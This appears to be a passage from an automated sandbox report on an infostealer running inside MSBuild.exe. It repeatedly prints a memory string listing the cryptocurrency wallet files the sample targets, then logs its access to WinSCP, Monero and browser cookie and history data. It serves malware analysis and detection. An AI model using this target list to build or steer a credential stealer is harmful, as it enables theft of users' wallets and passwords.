Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3356346368.0000000000CF0000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: exodus.*
Source: MSBuild.exe, 00000001.00000002.3356346368.0000000000CF0000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: ethereum.*
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
